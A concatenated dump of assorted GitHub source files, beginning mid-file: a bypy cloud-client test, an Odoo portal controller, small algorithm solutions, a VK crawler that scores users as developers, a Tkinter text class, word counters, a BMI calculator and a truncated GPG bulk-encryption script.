filter(lambda x: rec and isinstance(x, basestring) and rec.search(x), list)\n\ndef makesuredir(dirname):\n\tif not os.path.exists(dirname):\n\t\tos.mkdir(dirname)\n\n# TODO: this is a quick hack, need to re-structure the directory later\n# http://stackoverflow.com/questions/11536764/attempted-relative-import-in-non-package-even-with-init-py/27876800#27876800\nbypydir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n#sys.path.insert(0, bypydir)\nsys.path.append(bypydir)\n#print(sys.path)\nconfigdir = 'configdir'\ndownloaddir = 'downdir'\ntestdir = 'testdir'\nsharedir = 'sharedir'\nimport bypy\n# monkey patch all the way\nmpr = StorePrinter(bypy.pr)\nbypy.pr = mpr.pr\n# create some dummy files\nzerofilename = os.path.join(testdir, 'allzero.1m.bin')\nmakesuredir(configdir)\nshutil.copy('bypy.json', configdir)\nshutil.copy('bypy.setting.json', configdir)\nby = bypy.ByPy(configdir=configdir, debug=1, verbose=1)\n\ndef testmergeinto():\n\tfromc = {\n\t\t'a': {\n\t\t\t'a1': 1,\n\t\t\t'a2': 2\n\t\t},\n\t\t'b': {\n\t\t\t'b1': 10,\n\t\t\t'b2': 20\n\t\t}\n\t}\n\n\tto = {\n\t\t'a': {\n\t\t\t'a1': 9,\n\t\t\t'a3': 3\n\t\t},\n\t\t'b': {\n\t\t\t'b2': 90,\n\t\t\t'b3': 30,\n\t\t},\n\t\t'c': {\n\t\t\t'c1': 100\n\t\t}\n\t}\n\ttoorig = copy.deepcopy(to)\n\n\tpprint.pprint(fromc)\n\tpprint.pprint(to)\n\tbypy.cached.mergeinto(fromc, to)\n\tpprint.pprint(to)\n\tprint(repr(to))\n\tassert to == {u'a': {u'a1': 9, u'a3': 3, u'a2': 2}, u'c': {u'c1': 100}, u'b': {u'b1': 10, u'b2': 90, u'b3': 30}}\n\n\tto = toorig\n\tpprint.pprint(fromc)\n\tpprint.pprint(to)\n\tbypy.cached.mergeinto(fromc, to, False)\n\tpprint.pprint(to)\n\tprint(repr(to))\n\tassert to == {u'a': {u'a1': 1, u'a3': 3, u'a2': 2}, u'c': {u'c1': 100}, u'b': {u'b1': 10, u'b2': 20, u'b3': 30}}\n\ndef createdummyfile(filename, size, value = 0):\n\twith open(filename, 'wb') as f:\n\t\tba = bytearray([value] * size)\n\t\tf.write(ba)\n\ndef prepare():\n\t# preparation\n\tif 'refresh' in sys.argv:\n\t\tby.refreshtoken()\n\t# we must upload something first, otherwise, listing / deleting the root directory will fail\n\tbanner(\"Uploading a file\")\n\tassert by.upload(testdir + '/a.txt') == bypy.ENoError\n\tprint(\"Response: {}\".format(by.response.json()))\n\tbanner(\"Listing the root directory\")\n\tassert by.list('/') == bypy.ENoError\n\tprint(\"Response: {}\".format(by.response.json()))\n\tmpr.empty()\n\tcreatedummyfile(zerofilename, 1024 * 1024)\n\n\tmakesuredir(sharedir)\n\tsharesubdir = sharedir + '/subdir'\n\tmakesuredir(sharesubdir)\n\tcreatedummyfile(sharedir + '/1M0.bin', 1024 * 1024)\n\tcreatedummyfile(sharedir + '/1M1.bin', 1024 * 1024, 1)\n\tcreatedummyfile(sharesubdir + '/1M2.bin', 1024 * 1024, 2)\n\n\tif TestGarbledPathNames:\n\t\tjd = testdir.encode() + os.sep.encode() + b'garble\\xec\\xeddir'\n\t\tjf = testdir.encode() + os.sep.encode() + b'garble\\xea\\xebfile'\n\t\tmakesuredir(jd)\n\t\twith open(jf, 'w') as f:\n\t\t\tf.write(\"garbled\")\n\ndef emptyremote():\n\tbanner(\"Deleting all the files at PCS\")\n\tassert by.delete('/') == bypy.ENoError\n\tassert 'request_id' in by.response.json()\n\tmpr.empty()\n\ndef uploaddir():\n\t# upload\n\tbanner(\"Uploading the local directory\")\n\tassert by.upload(testdir, testdir) == bypy.ENoError\n\tassert filterregex(mpr.getq(),\n\t\t\t\t\t r\"RapidUpload: 'testdir[\\\\/]allzero.1m.bin' =R=\\> '/apps/bypy/testdir/allzero.1m.bin' OK\")\n\tassert filterregex(mpr.getq(), r\"'testdir[\\\\/]a.txt' ==> '/apps/bypy/testdir/a.txt' OK.\")\n\tassert filterregex(mpr.getq(), r\"'testdir[\\\\/]b.txt' ==> '/apps/bypy/testdir/b.txt' OK.\")\n\tprint(\"Response: {}\".format(by.response.json()))\n\tmpr.empty()\n\ndef getquota():\n\t# quota\n\tbanner(\"Getting quota\")\n\tassert by.info() == bypy.ENoError\n\tresp = by.response.json()\n\tprint(\"Response: {}\".format(resp))\n\t#assert resp['used'] == 1048626\n\tassert resp['quota'] == 2206539448320\n\tmpr.empty()\n\ndef assertsame():\n\tbypy.pr(by.result)\n\tassert len(by.result['diff']) == 0\n\tassert len(by.result['local']) == 0\n\tassert len(by.result['remote']) == 0\n\tassert len(by.result['same']) >= 5\n\ndef compare():\n\t# comparison\n\tbanner(\"Comparing\")\n\tassert by.compare(testdir, testdir) == bypy.ENoError\n\tassertsame()\n\tmpr.empty()\n\ndef downdir():\n\t# download\n\tbanner(\"Downloading dir\")\n\tshutil.rmtree(downloaddir, ignore_errors=True)\n\tassert by.downdir(testdir, downloaddir) == bypy.ENoError\n\tassert by.download(testdir, downloaddir) == bypy.ENoError\n\tassert by.compare(testdir, downloaddir) == bypy.ENoError\n\tassertsame()\n\tmpr.empty()\n\ndef syncup():\n\tbanner(\"Syncing up\")\n\temptyremote()\n\tassert by.syncup(testdir, testdir) == bypy.ENoError\n\tassert by.compare(testdir, testdir) == bypy.ENoError\n\tassertsame()\n\tmpr.empty()\n\ndef syncdown():\n\tbanner(\"Syncing down\")\n\tshutil.rmtree(downloaddir, ignore_errors=True)\n\tassert by.syncdown(testdir, downloaddir) == bypy.ENoError\n\tassert by.compare(testdir, downloaddir) == bypy.ENoError\n\tshutil.rmtree(downloaddir, ignore_errors=True)\n\tassertsame()\n\tmpr.empty()\n\ndef cdl():\n\tbanner(\"Offline (cloud) download\")\n\tresult = by.cdl_cancel(123)\n\tassert int(result) == 36016\n\tmpr.empty()\n\tassert by.cdl_list() == bypy.ENoError\n\t# {u'request_id': 353951550, u'task_info': [], u'total': 0}\n\tassert filterregex(mpr.getq(), r\"'total'\\s*:\\s*0\")\n\tmpr.empty()\n\tassert by.cdl_query(123) == bypy.ENoError\n\tassert filterregex(mpr.getq(), r\"'result'\\s*:\\s*1\")\n\tmpr.empty()\n\tassert by.cdl_add(\"http://dl.client.baidu.com/BaiduKuaijie/BaiduKuaijie_Setup.exe\", testdir) == bypy.ENoError\n\tassert filterregex(mpr.getq(), r\"'task_id'\\s*:\\s*\\d+\")\n\tassert by.cdl_addmon(\"http://dl.client.baidu.com/BaiduKuaijie/BaiduKuaijie_Setup.exe\", testdir) == bypy.ENoError\n\tmpr.empty()\n\ndef testshare():\n\tbanner(\"Share\")\n\t#assert bypy.ENoError == by.share(sharedir, '/', True, True)\n\tassert bypy.ENoError == by.share(sharedir, sharedir)\n\tassert filterregex(mpr.getq(), r\"bypy accept /{}/1M0.bin\".format(sharedir))\n\tassert filterregex(mpr.getq(), r\"bypy accept /{}/1M1.bin\".format(sharedir))\n\tassert filterregex(mpr.getq(), r\"bypy accept /{}/subdir/1M2.bin\".format(sharedir))\n\tmpr.empty()\n\tassert bypy.ENoError == by.upload(sharedir, sharedir)\n\tassert bypy.ENoError == by.share(sharedir, sharedir, False)\n\tassert filterregex(mpr.getq(), r\"bypy accept /{}/1M0.bin\".format(sharedir))\n\tassert filterregex(mpr.getq(), r\"bypy accept /{}/1M1.bin\".format(sharedir))\n\tassert filterregex(mpr.getq(), r\"bypy accept /{}/subdir/1M2.bin\".format(sharedir))\n\tmpr.empty()\n\ndef main():\n\ttestmergeinto()\n\tprepare()\n\ttime.sleep(2)\n\ttestshare()\n\ttime.sleep(2)\n\t# sleep sometime helps preventing hanging requests \n\tcdl()\n\ttime.sleep(2)\n\temptyremote()\n\ttime.sleep(2)\n\ttime.sleep(2)\n\tuploaddir()\n\ttime.sleep(2)\n\tgetquota()\n\ttime.sleep(2)\n\tcompare()\n\ttime.sleep(2)\n\tdowndir()\n\ttime.sleep(2)\n\tsyncup()\n\ttime.sleep(2)\n\tsyncdown()\n\n\t# test aria2 downloading\n\tglobal by\n\tby = bypy.ByPy(configdir=configdir, downloader='aria2', debug=1, verbose=1)\n\tdowndir()\n\n\t# clean up\n\tos.remove(zerofilename)\n\tshutil.rmtree(configdir, ignore_errors=True)\n\tshutil.rmtree(sharedir, ignore_errors=True)\n\tshutil.rmtree(downloaddir, ignore_errors=True)\n\n# this is barely a sanity test, more to be added\nif __name__ == \"__main__\":\n\tmain()\n\n# vim: tabstop=4 noexpandtab shiftwidth=4 softtabstop=4 ff=unix fileencoding=utf-8\n","repo_name":"mhxie/Recloud","sub_path":"core/adaptor/bypy/test/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":7805,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"20437528675","text":"from collections import OrderedDict\n\nfrom odoo import http, _\nfrom odoo.addons.portal.controllers.portal import CustomerPortal, get_records_pager\nfrom odoo.http import request\n\n\nclass CustomerPortal(CustomerPortal):\n\n def _prepare_portal_layout_values(self):\n values = super(CustomerPortal , self)._prepare_portal_layout_values()\n # domain is needed to hide non portal project for employee\n # portal users can't see the privacy_visibility, fetch the domain for them in sudo\n subscription_count = request.env['omixbilling.subscription'].search_count([])\n values.update({\n 'subscription_count': subscription_count,\n })\n return values\n\n @http.route(['/my/subscriptions', '/my/subscriptions/page/'], type='http', auth=\"user\", website=True)\n def my_subscriptions(self, page=1, date_begin=None, date_end=None, project=None, sortby=None, **kw):\n values = self._prepare_portal_layout_values()\n\n sortings = {\n 'date': {'label': _('Newest'), 'order': 'create_date desc'},\n 'name': {'label': _('Name'), 'order': 'name'},\n }\n\n domain = ([])\n order = sortings.get(sortby, sortings['date'])['order']\n\n # archive groups - Default Group By 'create_date'\n archive_groups = self._get_archive_groups('omixbilling.subscription', [('active', '=', False)])\n # pager\n pager = request.website.pager(\n url=\"/my/subscriptions\",\n url_args={'date_begin': date_begin, 'date_end': date_end},\n total=values['subscription_count'],\n page=page,\n step=self._items_per_page\n )\n # content according to pager and archive selected\n subscriptions = request.env['omixbilling.subscription'].search(domain, order=order, limit=self._items_per_page, offset=pager['offset'])\n\n values.update({\n 'date': date_begin,\n 'date_end': date_end,\n 'sortings': sortings,\n 'sortby': sortby,\n 'subscriptions': subscriptions,\n 'page_name': 'subscription',\n 'archive_groups': archive_groups,\n 'default_url': '/my/subscriptions',\n 'pager': pager\n })\n return request.render(\"omixbilling.my_subscriptions\", values)\n\n @http.route(['/my/subscriptions/'], type='http', auth=\"user\", website=True)\n def my_subscriptions_subscription(self, subscription_id=None, **kw):\n subscription = request.env['omixbilling.subscription'].browse(subscription_id)\n return request.render(\"omixbilling.my_subscriptions_subscription\", {'subscription': subscription})\n\n","repo_name":"mustafirus/odoo_my_modules","sub_path":"omixbilling/controllers/controllers.py","file_name":"controllers.py","file_ext":"py","file_size_in_byte":2681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71228621227","text":"#Leetcode https://leetcode.com/problems/climbing-stairs/\n\n\n# Big O \n# Time - O(n)\n# Space - O(n)\nclass Solution:\n\n def climbStairs(self, n):\n \n steps = [0] * (n + 1)\n\n if n == 0:\n return 0\n\n if n == 1:\n return 1\n\n\n steps[0] = 1\n steps[1] = 2\n\n for i in range(2, n + 1):\n steps[i] = steps[i - 1] + steps[i - 2]\n\n return steps[n - 1]\n \nsolution = Solution()\nprint(solution.climbStairs(45))","repo_name":"felipedss/algorithms","sub_path":"python/dynamic-programming/climbing-stairs.py","file_name":"climbing-stairs.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"10375258257","text":"import collections\n\nimport pandas as pd\nimport vk_api\n\nimport analysis\n\nvk = None\ntukallo_id = '125376958'\n\nSCORE_THRESHOLD = 4 # score is given from 0 to 10. If score >= threshold => user is a programmer\n\n\ndef get_score(id):\n \"\"\"\n :param id: user_id to get_score for\n :return: (rating: ing, lang_stat: dict), where rating is an int in a range [0; 10]\n depicting assurance, that a user is a programmer,\n lang_stat is user's statistics about programming languages from LANGUAGES\n \"\"\"\n return analysis.analyze_user(id, vk)\n\n\ndef get_max(d: dict):\n maxx = 0\n ans = \"-\"\n for key in d:\n val = d[key]\n if val > maxx:\n ans = key\n maxx = val\n return ans\n\n\ndef walk_and_store(start_id=tukallo_id, lang=\"\", limit=100):\n programmers = pd.DataFrame(columns=('id', 'first_name', 'last_name', 'rank', 'language', 'link'))\n\n start = vk.users.get(user_ids=start_id)[0]\n start_user = (start_id, start['first_name'], start['last_name'])\n\n observed_users = set()\n observed_users.add(start_user)\n\n to_visit = collections.deque()\n to_visit.append(start_user)\n\n # starting bfs\n while len(to_visit) != 0:\n cur_user = to_visit.popleft() # (id, first_name, last_name)\n\n # try to get friends to learn if the account was deleted\n try:\n friends = vk.friends.get(user_id=cur_user[0], fields='first_name,last_name')\n except vk_api.exceptions.ApiError as error_msg:\n continue\n\n # analyze user\n score = get_score(cur_user[0])\n\n link = 'https://vk.com/id' + str(cur_user[0])\n best_lang = get_max(score[1])\n if lang == '':\n if score[0] >= SCORE_THRESHOLD:\n programmers.loc[len(programmers)] = [*cur_user, score[0], best_lang, link]\n elif score[1][lang] > 0:\n programmers.loc[len(programmers)] = [*cur_user, score[0], lang, link]\n\n if len(programmers) >= limit:\n break\n\n for friend in friends['items']:\n friend_t = (friend['id'], friend['first_name'], friend['last_name'])\n if friend_t not in observed_users:\n if friend_t[1] == 'Tukallo':\n print('fucking shit!')\n to_visit.append(friend_t)\n observed_users.add(friend_t)\n\n # bfs is finished, time to save programmers we found\n programmers = programmers.sort_values(by=['rank'], ascending=False)\n programmers.to_csv('processed/' + start_user[1] + start_user[2] + str(limit) + lang + \".csv\")\n\n\ndef get_developers(vk_id=tukallo_id, lang='', limit=10):\n \"\"\"\n Method finds all the developers in a specified programming language close to specified user_id\n :param vk_id: user to start search from\n :param lang: language to filter developers with. If lang == '', then all the developers are reported\n without filtering by language\n :param limit: number of developers to report\n :return: output is written to console & csv file\n \"\"\"\n login, password = \"alex.tukallo@gmail.com\", \"\"\n vk_session = vk_api.VkApi(login=login)\n\n try:\n vk_session.auth()\n except vk_api.AuthError as error_msg:\n print(error_msg)\n return\n\n print(\"authorized\")\n\n global vk\n vk = vk_session.get_api()\n\n walk_and_store(vk_id, lang, limit)\n\n\nif __name__ == '__main__':\n # get all the developers in all the programming languages:\n get_developers(limit=40) # Tukallo\n get_developers(vk_id='53448', limit=40) # Andrey Novoselsky\n get_developers(vk_id='33251758', limit=5) # Yuriy Tikhonov\n\n # get all the developers for a specific programming language:\n get_developers(lang='python', limit=10) # Tukallo\n get_developers(vk_id='53448', lang='java', limit=10) # Andrey Novoselsky\n get_developers(vk_id='225270855', lang='php', limit=1) # Ivan Revin\n","repo_name":"atukallo/VKDevelopers","sub_path":"preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":3890,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"18194889198","text":"\n# Tkinter imports\nfrom tkinter import Canvas\nfrom tkinter import CENTER\nfrom tkinter import NW\nfrom tkinter.font import Font\n\n# Python imports\nfrom typing import Tuple, Dict\n\n# Package imports\nfrom ..base import BoxCollider\nfrom ..base import GameObject\nfrom ..base import fonts\n\nfrom ..common import convertRGBToHex\n\nclass Text(GameObject):\n '''\n Base class for text gameObjects. \n\n Parameters\n ----------\n canvas - tkinter canvas object.\n\n position - where to place the text object on the screen (0-1)\n\n text - text string of what to display\n\n font - Name of a font. \"Courier\" \"Times New Roman\" etc.\n\n fontSize - int for font size. See fonts.py file to see the minimum and maximum sizes.\n\n textColor - (r, g, b) float values from (0, 1). Color of the text.\n\n anchor - tkinter anchor value (NW, S, CENTER, etc.)\n '''\n\n def __init__(\n self,\n canvas: Canvas,\n position: Tuple[float],\n text: str,\n font: str = \"Courier\",\n fontSize: int = 12,\n textColor: Tuple[float, float, float] = (1.0, 1.0, 1.0),\n anchor: str = CENTER,\n **kwargs\n ):\n \n # Initialize the gameobject\n GameObject.__init__(self, canvas, **kwargs)\n\n # The text object needs to remeber its initial font size so it can be rezied appropriately\n self.initialFontSize: int = fontSize\n self.currentFontSize: int = fontSize\n\n # Set the values for text\n self.text: str = text\n self.font: Dict[int, Font] = fonts.FONTS[font]\n self.textColor: str = convertRGBToHex(textColor)\n\n # Set up the collider for the text.\n self.collider: BoxCollider = BoxCollider(position[0], position[1], 0, 0, anchor = anchor)\n\n # Remember the original position\n self.originalPosition: Tuple[float] = position\n \n # Create textID\n self.textID: int = 0\n\n def updateText(self):\n '''\n\n '''\n\n self.collider.x = self.originalPosition[0]\n self.collider.y = self.originalPosition[1]\n\n self.collider.w = self.font[self.currentFontSize].measure(self.text) / self.screenWidth\n self.collider.h = self.font[self.currentFontSize].metrics()[\"linespace\"] / self.screenHeight\n self.collider.adjustPoints()\n\n def _setup(self):\n self.updateText()\n\n def _draw(self):\n\n if self.textID != 0:\n self.canvas.delete(self.textID)\n \n self.textID = self.canvas.create_text(\n self.collider.x * self.screenWidth,\n self.collider.y * self.screenHeight,\n text = self.text,\n fill = self.textColor,\n anchor = NW, # Anchor is always NW because the collider normalizes all points to be this way\n font = self.font[self.currentFontSize]\n )\n\n\n def _resize(self):\n '''\n Resize the text according to the new screen width and height.\n '''\n\n # May need to create different sized text as the size is adjusted. Do this here.\n textSize = int(self.initialFontSize * self.screenWidth / self.initialScreenWidth)\n\n # Don't let the text be resized larger or smaller than the available text sizes.\n if textSize < fonts.SMALLEST_FONT_SIZE:\n textSize = fonts.SMALLEST_FONT_SIZE\n if textSize > fonts.LARGEST_FONT_SIZE:\n textSize = fonts.LARGEST_FONT_SIZE\n\n self.currentFontSize = textSize\n\n # Now call all the canvas methods necessary\n self.updateText()\n \n def _delete(self):\n '''\n Remove all the IDs from the canvas\n '''\n\n self.canvas.delete(self.textID)","repo_name":"flywinged/TkGE","sub_path":"src/objects/text.py","file_name":"text.py","file_ext":"py","file_size_in_byte":3736,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"45131798619","text":"import re\n\n\n# funcção que monta um vetor com todas as palavras diferentes dado um arquivo e um vetor de palavras\ndef check_words_on_files(file_name, vocabulary, sequence_words):\n with open(file_name, 'r') as file:\n for line in file:\n line_spread = []\n for line_iteration in line.split():\n line_spread += line_iteration.split('-')\n for index, word in enumerate(line_spread):\n if sequence_words == 2:\n if index < len(line_spread) - 1:\n word_test = re.sub('\\W+', '', word).lower()\n word_test_next = re.sub('\\W+', '', line_spread[index + 1]).lower()\n word_test_if = word_test + ' ' + word_test_next\n if not word_test_if in vocabulary:\n vocabulary.append(word_test + ' ' + word_test_next)\n else:\n word_test = re.sub('\\W+', '', word).lower()\n if not word_test in vocabulary:\n vocabulary.append(word_test)\n return vocabulary\n\n\ndef file_to_string(file_name, sequence_words):\n string_return = []\n with open(file_name, 'r') as file:\n for line in file:\n line_spread = []\n for line_iteration in line.split():\n line_spread += line_iteration.split('-')\n for index, word in enumerate(line_spread):\n if sequence_words == 2:\n if index < len(line_spread) - 1:\n word_test = re.sub('\\W+', '', word).lower()\n word_test_next = re.sub('\\W+', '', line_spread[index + 1]).lower()\n string_return.append(word_test + ' ' + word_test_next)\n else:\n word_test = re.sub('\\W+', '', word).lower()\n string_return.append(word_test)\n return string_return\n\n\ndef count_words_on_file(file_name, words_list, sequence_words):\n list_of_counted_words = []\n words_in_file = file_to_string(file_name, sequence_words)\n for word_to_count in words_list:\n list_of_counted_words.append(words_in_file.count(word_to_count))\n return list_of_counted_words\n\n\nwords = check_words_on_files('text1.txt', [], 1)\nwords = check_words_on_files('text2.txt', words, 1)\nwords_text1 = check_words_on_files('text1.txt', [], 1)\nwords_text2 = check_words_on_files('text2.txt', [], 1)\nlist_words1 = count_words_on_file('text1.txt', words, 1)\nlist_words2 = count_words_on_file('text2.txt', words, 1)\n\nprint('\\n=== PALAVRAS ISOLADAS ===')\nprint('Vocabulário')\nprint('Texto 1: ', words_text1)\nprint('Texto 2: ', words_text2)\nprint('Texto 1 e 2: ', words)\nprint('Vetor de palavras')\nprint('Texto 1: ', list_words1)\nprint('Texto 2: ', list_words2)\n\nprint('\\n=== PALAVRAS EM SEQUENCIA ===')\nwords_2seq = check_words_on_files('text1.txt', [], 2)\nwords_2seq = check_words_on_files('text2.txt', words_2seq, 2)\nwords_text1_2seq = check_words_on_files('text1.txt', [], 2)\nwords_text2_2seq = check_words_on_files('text2.txt', [], 2)\nlist_words1_2seq = count_words_on_file('text1.txt', words_2seq, 2)\nlist_words2_2seq = count_words_on_file('text2.txt', words_2seq, 2)\n\nprint('Vocabulário')\nprint('Texto 1: ', words_text1_2seq)\nprint('Texto 2: ', words_text2_2seq)\nprint('Texto 1 e 2: ', words_2seq)\nprint('Vetor de palavras')\nprint('Texto 1: ', list_words1_2seq)\nprint('Texto 2: ', list_words2_2seq)","repo_name":"armonova/proof-cinnec","sub_path":"python/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20637352637","text":"from typing import List\nimport collections\n\nclass Solution:\n def findItinerary(self, tickets: List[List[str]]) -> List[str]:\n graph = collections.defaultdict(list)\n for a, b in sorted(tickets):\n graph[a].append(b)\n\n route, stack = [], ['JFK']\n while stack:\n while graph[stack[-1]]:\n print(f'graph[stack[-1]: {graph[stack[-1]]}')\n stack.append(graph[stack[-1]].pop(0))\n print(f'stack : {stack}')\n print(f'route : {route}')\n route.append(stack.pop())\n\n return route[::-1]\n\nprint(Solution().findItinerary([[\"JFK\", \"KUL\"], [\"JFK\", \"NRT\"], [\"NRT\", \"JFK\"]]))\n\n","repo_name":"PARKINHYO/Algorithm","sub_path":"python algorithm interview/12장 그래프/일정 재구성 - stack.py","file_name":"일정 재구성 - stack.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"2525491244","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@Author : WeiDongcheng @tonse\n@Time : 2022/10/17 18:05\n@File : xml_util.py\n@Desc : \n\"\"\"\n\n\ndef read_xml(filePath):\n from bs4 import BeautifulSoup # 需要 pip install beautifulsoup4\n from lxml import etree # 需要pip install lxml\n\n # 先从xml文件读取到内存\n content_str = \"\"\n with open(filePath, \"r\", encoding=\"utf8\") as f:\n line = f.readline()\n content_str += line\n while line:\n line = f.readline()\n content_str += line\n xml_tree = BeautifulSoup(content_str, \"lxml-xml\") # 字符串读取为bs4的xml对象\n datasource = xml_tree.findAll(\"datasource\")\n source_0 = datasource[0].findAll(\"source\")\n print(source_0[0]) # 找到\n print(source_0[0][\"name\"] + \" = \" + source_0[0][\"value\"]) # 获取速度值,打印speed_value = 0\n\n\nif __name__ == \"__main__\":\n print(\"start ...\")\n read_xml(r\"V3_master_bp.xml\")\n print(\"end ...\")\n","repo_name":"TonsenWei/pyhelper","sub_path":"src/examples/xml/xml_util.py","file_name":"xml_util.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21523253091","text":"def dfs(graph, v):\n stack=[] \n discovered=set()\n count=0\n stack.append((v, count))\n countall=0\n while stack:\n (v, count)=stack.pop()\n countall+=count\n if v not in discovered:\n discovered.add(v)\n if v in graph:\n for w in graph[v]:\n stack.append((w, count+1))\n return countall\n\ndef dfs2(graph, source, target):\n stack=[] \n discovered=set()\n count=0\n stack.append((source, count))\n countList=[]\n while stack:\n (v, count)=stack.pop()\n if v == target:\n countList.append(count)\n continue\n if v not in discovered:\n discovered.add(v)\n if v in graph:\n for w in graph[v]:\n stack.append((w, count+1))\n return min(countList)\n\ndef partOne():\n with open(\"input.txt\", \"r\") as inputFile:\n graph={}\n for line in inputFile:\n A, B= line.strip().split(')')\n if A in graph:\n graph[A].append(B)\n else:\n graph[A]=[B]\n print(dfs(graph, \"COM\"))\n\n\n\ndef partTwo():\n with open(\"input.txt\", \"r\") as inputFile:\n graph={} \n for line in inputFile:\n A, B= line.strip().split(')')\n if A in graph:\n graph[A].append(B)\n else:\n graph[A]=[B]\n if B in graph:\n graph[B].append(A)\n else:\n graph[B]=[A]\n\n pathLen=[]\n for adjY in graph[\"YOU\"]:\n for adjS in graph[\"SAN\"]:\n pathLen.append(dfs2(graph, adjY, adjS))\n print(min(pathLen))\n\n\nprint(\"Answer for part one: \")\npartOne()\nprint(\"Answer for part two: \")\npartTwo()\n","repo_name":"strogera/AoC2019","sub_path":"Day6/day6.py","file_name":"day6.py","file_ext":"py","file_size_in_byte":1728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33814516760","text":"import matplotlib.pyplot as plt\nimport polars as pl\nimport pandas as pd\n\n\ndef polars_describe(polars_data):\n return polars_data.describe()\n\n\ndef get_median(polars_data):\n return polars_data.median()\n\n\ndef PlotShapeLeng(csv):\n pd.set_option(\"display.max_columns\", None)\n polars_data = pl.read_csv(csv)\n plt.figure(figsize=(10, 6))\n plt.hist(polars_data[\"Shape_Leng\"], bins=20, edgecolor=\"black\")\n plt.title(\"Shape_Leng Distribution\")\n plt.xlabel(\"Shape_Leng\")\n plt.ylabel(\"Count\")\n plt.show()\n\ndef PlotShapeArea(csv):\n pd.set_option(\"display.max_columns\", None)\n polars_data = pl.read_csv(csv)\n plt.figure(figsize=(10, 6))\n plt.hist(polars_data[\"Shape_Area\"], bins=20, edgecolor=\"black\")\n plt.title(\"Shape_Area Distribution\")\n plt.xlabel(\"Shape_Area\")\n plt.ylabel(\"Count\")\n plt.show() \n","repo_name":"nogibjj/706-Week3-mini-project","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24784243351","text":"import cv2\r\nimport matplotlib.pyplot as plt\r\n\r\nimg = cv2.imread ('C:/Users/Victor Pacheco Garci/Desktop/UPC/2017-18/GDSA/Team5/Farmacia Albinyana/farmacia_albinyana_101.jpg',1)\r\n\r\n#Crea l'objecte surf\r\n#Configurem Hessian Threshold a 400\r\nsurf = cv2.SURF(10)\r\n\r\n#calcula els punts clau i verifica el seu numero\r\nkp, des = surf.detectAndCompute(img,None)\r\nlen(kp)\r\n\r\n#verifica l'umbral actual de Hesse\r\n#ek En casos reals, es millor tenir valors entre 300 i 500\r\nsurf.hessianThreshold = 400\r\nimg2 = cv2.drawKeypoints(img,kp,None,(255,0,0),0)\r\nplt.imshow(img2),plt.show()","repo_name":"gdsa-upc/PicZam","sub_path":"S3/SURF.py","file_name":"SURF.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"ca","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28782966004","text":"# Vstupní hodnoty uživatele\njmeno = input(\"Tvoje jméno:\", )\nvaha = float(input(\"Tvoje váha (kg):\"))\nvyska = float(input(\"Tvoje výška (m):\"))\njmeno = \"Ty hele,\"\n#vaha = 113\n#vyska = 1.91\n\n# Výpočet BMI\nbmi = vaha / vyska ** 2\n\n#když by se výška zadávala v cm, což je přirozeněnjší\n#bmi = vaha / (vyska / 100) ** 2)\n\n# Vytvoř proměnnou \"kategorie\", kam uložíš slovní ohodnocení BMI\nif bmi < 18.5:\n kategorie = \"což znamená, že brzo pojdeš, protože nežereš!\"\nelif bmi >= 18.5 and bmi <= 25:\n kategorie = \"seš hubenej, běž se najest...\"\nelif bmi > 25 and bmi <= 30:\n kategorie = \"takže jsi v pohodě, normální chlap\"\nelif bmi > 30 and bmi <= 40:\n kategorie = \", nežer tolik\"\nelse:\n kategorie = \", seš tlustej jak prase, dělej se sebou něco!\"\n\n# Vytiskni odpoved s vysledkem - aby prošlo testem\n#print(jmeno, \"Tvoje BMI je\", bmi, kategorie)\n\n# lepší výstup\nprint(jmeno, \"Tvoje BMI je\", round(bmi, 1), kategorie)","repo_name":"miraliska/Engeto_projects","sub_path":"ENGETO/02. Podminky_a_metody/Cviceni_02_03_BMI_kalkulacka.py","file_name":"Cviceni_02_03_BMI_kalkulacka.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"cs","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42774990154","text":"import argparse\nimport datetime\nimport os\nimport sys\nimport gnupg\n\n\n# Walk directory for files\ndef get_files(path):\n \"\"\"This function recursively crawls a directory for files\n and saves them to a list with their full path\n\n Args:\n path: The path to a folder of files to perform bulk actions on\n\n Returns:\n files: An array of files with their full paths\n\n \"\"\"\n files = [] # Instantiate variable for returning list of files\n # Walk the entire path\n # Using _ instead of directories makes it a temporary discarded variable\n # This is more proper and will not ding the linting score\n for root, _, filenames in os.walk(path):\n # Look only for files\n for filename in filenames:\n # Ignore hidden files\n if filename[0] != \".\":\n file = os.path.join(root, filename)\n files.append(file)\n return files\n\n\n# Bulk Encrypt Files\ndef gpg_bulk_encrypt(key_emails, delete_flag, path, log_file):\n \"\"\"This function recursively checks the path provided\n for all non .gpg files and encrypts them\n\n Args:\n key_emails: The list of email(s) belonging to the GPG key(s) involved\n delete_flag: True or False flag to delete the original file when performing actions\n path: The path to a folder of files to perform bulk actions on\n log_file: The open log file that entries are written to\n\n \"\"\"\n now = datetime.datetime.now()\n log_file.write(\"%s: Scanning %s for 